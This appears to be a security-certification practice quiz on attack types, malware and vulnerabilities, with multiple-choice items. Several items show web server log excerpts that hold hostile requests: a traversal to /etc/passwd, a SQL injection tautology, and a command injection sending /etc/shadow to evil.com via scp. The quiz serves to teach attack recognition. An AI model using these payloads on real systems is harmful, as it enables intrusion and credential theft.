Domain 1 Quiz

  1. Match each attack name (a through d) to a description (1 through 4), using each attack name once. Answer in a form like "Number 5 matches e", for numbers 1 through 4. On the real exam, this will take the form of pull-down menus by each description.
    1. Walking down the street, you get advertising messages from stores you are walking past
    2. You hear from friends that contact information they shared only with you seems to be loose on the Internet
    3. You receive text messages containing random advertisements
    4. You receive recorded phone calls that you believe are in Mandarin, a language you don't speak
    a. SPIM
    b. Bluesnarfing
    c. Vishing
    d. Bluejacking
  2. Liz is a security analyst for the IT department of a large university with a correspondingly large number of users. She has been investigating a sophisticated privilege escalation attack. She has determined that the attacker used an ordinary user account with a rather large user ID number. The attack changed that to a very low user ID number, associated with a highly privileged system account. Which of these did the attack utilize?
    1. Improper account configuration
    2. Memory leak
    3. Buffer overflow
    4. Integer overflow
    5. Race condition
  3. You observe the following.
    66.249.79.158 - - [01/Jul/2020:00:00:17 +0000] "GET /travel/uk/ben-nevis/ HTTP/1.1" 200 16745 "-" TLSv1.2 ECDHE-ECDSA-CHACHA20-POLY1305
    54.36.148.211 - - [01/Jul/2020:00:01:30 +0000] "GET /travel/usa/new-york-internet/ HTTP/1.1" 200 80277 "-" - -
    174.58.65.29 - - [01/Jul/2020:00:02:27 +0000] "GET /../../../etc/passwd HTTP/1.1" 200 25310 "https://www.bing.com/" - -
    174.58.65.29 - - [01/Jul/2020:00:02:27 +0000] "GET /travel/japan/kamakura/ HTTP/1.1" 200 25310 "https://www.bing.com/" - -
    66.102.9.57 - - [01/Jul/2020:00:03:52 +0000] "GET / HTTP/1.1" 200 5050 "-" - -
    
    What type of attack has happened?
    1. SQL Injection
    2. Directory Traversal
    3. Buffer Overflow
    4. Command Injection
  4. You observe the following.
    66.249.79.158 - - [01/Jul/2020:00:00:17 +0000] "GET /travel/uk/ben-nevis/ HTTP/1.1" 200 16745 "-" TLSv1.2 ECDHE-ECDSA-CHACHA20-POLY1305
    54.36.148.211 - - [01/Jul/2020:00:01:30 +0000] "GET /travel/usa/new-york-internet/ HTTP/1.1" 200 80277 "-" - -
    174.58.65.29 - - [01/Jul/2020:00:02:27 +0000] "GET /cgi-bin/?cmd=scp%20/etc/shadow%20hacker@evil.com HTTP/1.1" 200 25310 "https://www.bing.com/" - -
    174.58.65.29 - - [01/Jul/2020:00:02:27 +0000] "GET /travel/japan/kamakura/ HTTP/1.1" 200 25310 "https://www.bing.com/" - -
    66.102.9.57 - - [01/Jul/2020:00:03:52 +0000] "GET / HTTP/1.1" 200 5050 "-" - -
    
    What type of attack has happened?
    1. SQL Injection
    2. Directory Traversal
    3. Buffer Overflow
    4. Command Injection
  5. You observe the following.
    66.249.79.158 - - [01/Jul/2020:00:00:17 +0000] "GET /travel/uk/ben-nevis/ HTTP/1.1" 200 16745 "-" TLSv1.2 ECDHE-ECDSA-CHACHA20-POLY1305
    54.36.148.211 - - [01/Jul/2020:00:01:30 +0000] "GET /travel/usa/new-york-internet/ HTTP/1.1" 200 80277 "-" - -
    174.58.65.29 - - [01/Jul/2020:00:02:27 +0000] "GET /database/'%20OR%201=1%20;-- HTTP/1.1" 200 25310 "https://www.bing.com/" - -
    174.58.65.29 - - [01/Jul/2020:00:02:27 +0000] "GET /travel/japan/kamakura/ HTTP/1.1" 200 25310 "https://www.bing.com/" - -
    66.102.9.57 - - [01/Jul/2020:00:03:52 +0000] "GET / HTTP/1.1" 200 5050 "-" - -
    
    What type of attack has happened?
    1. SQL Injection
    2. Directory Traversal
    3. Buffer Overflow
    4. Command Injection
  6. You are examining web server logs, and you notice some unusually long requests. What type of attack has happened?
    1. SQL Injection
    2. Directory Traversal
    3. Buffer Overflow
    4. Command Injection
  7. Last week Ann, a staff member in the Human Resources department, did a Google search and clicked on one of the links on the first page of results. That took her to a strange page. She went back, realized she had misspelled her search, corrected that, and found what she needed. Today she logged on to her bank site from work and noticed some mysterious transfers from her account to a bank in Eastern Europe. What has happened?
    1. Clickjacking
    2. Ransomware
    3. Crimeware
    4. Extortionware
    5. Spyware
  8. Shonda, a security auditor at a financial institution, discovered an advanced attack that had stolen and exfiltrated a great deal of sensitive information. She searched a database for details of the attack, but found nothing. After a great deal of investigation and research, she discovered that it seems to be a new vulnerability with no available patch, and she implemented a workaround. What did she discover?
    1. False-positive event
    2. False-negative event
    3. Zero-day event
    4. IDS failure event
    5. IPS failure event
  9. Shari, a network engineer at a major health care facility, has determined that when the head of the Radiology department authenticated to the medical image database server, the encrypted traffic was captured by an intruder. That intruder later transmitted that information again to access the database as the highly privileged account. What type of attack is this?
    1. APT
    2. Rootkit
    3. Rogue AP
    4. Replay
  10. Mehmet, the database administrator, has discovered that a user has accidentally deleted an entire database table. What went wrong?
    1. Misconfigured account
    2. Untrained user
    3. Inadequate input validation
    4. Memory leak
  11. News reports tell of a major DDoS against a famous company. Meanwhile, you receive a letter from your ISP saying that your home computer is sending malicious Linux-sourced traffic. But you don't own a Linux computer; in fact, you don't own any computer. Your home electronics are limited to a smart TV with a Blu-ray player and a DVR. What has happened?
    1. Nothing, your ISP is wrong
    2. RAT
    3. BOT
    4. Trojan
  12. Jim is a software developer. Tina, his manager, has asked him to list software design and development security issues to share with new team members. Which of these is the reason for most software vulnerabilities?
    1. Improper input handling
    2. Inadequate error handling
    3. Support beyond end-of-life
    4. Default configurations
  13. Inga, a security analyst at a government agency, is inspecting the components of her operating system. She has identified what looks like a compatibility driver, but she suspects that it is being used by malware to monitor keystrokes and steal other data. If so, what malware technique has she discovered?
    1. Driver masquerading
    2. Shimming
    3. Driver refactoring
    4. Data flow manipulating
  14. Alexandra is a White Hat penetration tester doing a Black Box attack. She is using software to automatically submit queries to the search form on a web page. What is she doing?
    1. Active reconnaissance
    2. Passive reconnaissance
    3. Open-source analysis
    4. Pivoting
  15. Jermain is fielding help desk reports of WLAN clients repeatedly dissociating from their WAPs and having to reassociate. What may be responsible? Select two.
    1. Bluesnarfing
    2. Jamming
    3. War driving
    4. Channel conflicts
    5. SSID loss
  16. Vladimir has written some malicious software that adds unneeded loops, NOPs, and other ineffectual code every time it is executed or spread to a new platform. What technique is he using?
    1. Refactoring
    2. Shimming
    3. Masquerading
    4. Modifying
  17. Peter is a security analyst at a bank. The bank wants to extend its use of an outdated operating system, as the alternative would require replacing all their existing automated teller machines built into storefronts and standalone brick kiosks. What problem will they have to solve?
    1. Embedded systems
    2. EOL
    3. IoT
    4. Input validation
    5. Error handling
  18. George's manager needs to give a presentation to the board of directors, telling them about the most critical threat to the organization. What should George make sure is highlighted?
    1. Asset management
    2. Insider threat
    3. Social media
    4. Baseline deviations
    5. Performance
    6. Unauthorized software
  19. Why might you use fuzzing? Select two.
    1. You need to detect logical errors
    2. You don't have the source code
    3. You have the source code
    4. You have the source code, but you signed a non-disclosure agreement
    5. You're uncertain of the purpose of the software
  20. Refineries and waste water treatment plants are controlled by which of the following, which have been successfully attacked on multiple occasions:
    1. RTOS
    2. IoT
    3. SCADA
    4. SoC
    5. Embedded

Exhibit with 4 items plus 19 more questions

Passing = 82% of 23 = 18.9

Goal = 91% of 23 = 20.9
